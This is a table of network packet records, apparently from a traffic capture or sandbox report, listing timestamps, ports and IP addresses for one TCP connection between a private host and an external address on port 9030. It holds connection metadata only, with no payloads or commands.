Jan 10, 2024 15:39:01.252044916 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.252073050 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.252104998 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.252134085 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.252139091 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.252191067 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.252196074 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.252238035 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.252296925 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.252360106 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.252399921 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.252449036 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.252480984 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.252525091 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.252580881 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.252625942 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.252665997 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.252712965 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.252748013 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.252790928 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.252865076 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.252907038 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.257810116 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.257853031 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.257868052 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.257915020 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.257956028 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.258004904 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.258013010 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.258065939 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.258086920 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.258143902 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.258145094 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.258189917 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.258256912 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.258305073 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.258330107 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.258373976 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.258384943 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.258445024 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.258471012 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.258498907 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.258502960 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.258548975 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.258622885 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.258668900 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.259886026 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.259947062 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.259963989 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.259991884 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.260008097 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.260039091 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.260042906 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.260085106 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.260113955 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.260159969 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.260163069 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.260201931 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.260212898 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.260256052 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.260289907 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.260334969 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.260348082 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.260394096 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.260404110 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.260448933 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.260474920 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.260518074 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.260575056 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.260620117 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.260628939 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.260673046 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.260680914 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.260721922 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.260730028 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.260775089 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.260782003 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.260821104 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.260835886 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.260875940 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.260889053 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.260929108 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.260957956 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.260999918 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.261029959 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.261075020 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.261090040 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.261132002 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.261157036 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.261198044 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.261229038 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.261271000 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.261351109 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.261398077 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.261485100 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.261531115 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.261552095 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.261591911 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.262702942 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.262753010 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.262764931 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.262795925 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.262799978 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.262840033 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.262871981 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.262896061 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.262911081 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.262942076 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.262944937 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.262984991 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.263025999 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.263072968 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.263077974 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.263128996 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.263156891 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.263199091 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.263231039 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.263271093 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.263312101 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.263358116 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.263365030 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.263405085 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.263433933 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.263483047 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.414175987 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.414207935 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.414222956 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.414253950 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.414266109 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.414294004 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.414313078 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.414333105 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.414372921 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.414383888 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.414427042 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.414450884 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.414500952 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.414504051 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.414556980 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.414561033 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.414612055 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.414629936 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.414678097 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.415021896 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.415093899 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.415107012 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.415182114 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.415200949 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.415242910 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.415303946 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.415344954 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.415393114 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.415431976 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.415481091 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.415522099 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.415553093 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.415606022 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.415651083 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.415695906 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.415738106 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.415791988 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.415812969 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.415852070 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.415910959 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.415961027 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.415997982 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.416053057 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.416099072 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.416137934 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.416189909 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.416253090 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.416271925 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.416315079 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.416326046 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.416368008 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.416414976 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.416456938 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.416591883 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.416641951 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.416663885 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.416702986 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.416771889 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.416819096 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.416851044 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.416892052 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.416944981 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.416990042 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.417020082 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.417067051 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.417112112 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.417159081 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.417278051 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.417321920 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.417371988 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.417428017 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.417459965 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.417538881 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.417567015 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.417589903 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.417638063 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.417701960 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.417752028 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.417793036 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.417855978 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.417917013 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.417920113 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.417962074 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.417993069 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.418046951 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.418108940 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.418154955 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.418194056 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.418236017 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.418241978 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.418277979 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.418335915 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.418378115 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.418387890 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.418432951 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.418458939 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.418478012 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.418495893 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.418540001 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.418591022 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.418632984 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.418662071 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.418701887 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.418704033 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.418739080 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.418759108 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.418797016 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.418811083 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.418852091 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.418869019 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.418914080 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.418915987 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.418965101 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.418977976 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.419014931 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.419023991 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.419058084 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.419091940 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.419133902 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.419245005 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.419287920 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.419370890 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.419414043 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.419472933 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.419523001 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.419528961 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.419574976 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.419599056 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.419656038 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.419658899 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.419699907 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.419714928 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.419753075 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.419810057 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.419855118 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.420001984 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.420054913 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.420088053 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.420124054 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.420157909 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.420157909 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.420177937 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.420231104 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.420238972 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.420269012 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.420289993 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.420331001 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.420334101 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.420373917 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.420392036 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.420435905 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.420454979 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.420484066 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.420516968 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.420562029 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.420572996 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.420603037 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.420623064 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.420660973 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.420681000 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.420727015 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.420778036 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.420780897 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.420818090 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.420840979 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.420979977 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.421037912 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.421072960 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.421112061 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.421154976 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.421195030 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.421302080 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.421354055 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.421528101 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.421602011 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.421648979 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.421700954 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.421714067 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.421757936 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.421780109 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.421835899 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.421885014 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.421941042 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.421983957 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.422033072 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.422065020 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.422118902 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.422276020 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.422328949 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.422353029 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.422398090 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.422420025 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.422470093 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.422523975 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.422581911 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.422615051 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.422671080 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.422749996 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.422817945 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.422852039 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.422911882 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.422933102 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.422976971 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.423000097 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.423043013 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.423046112 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.423089027 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:01.423104048 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:01.423147917 CET	49726	9030	192.168.2.6	193.11.164.243
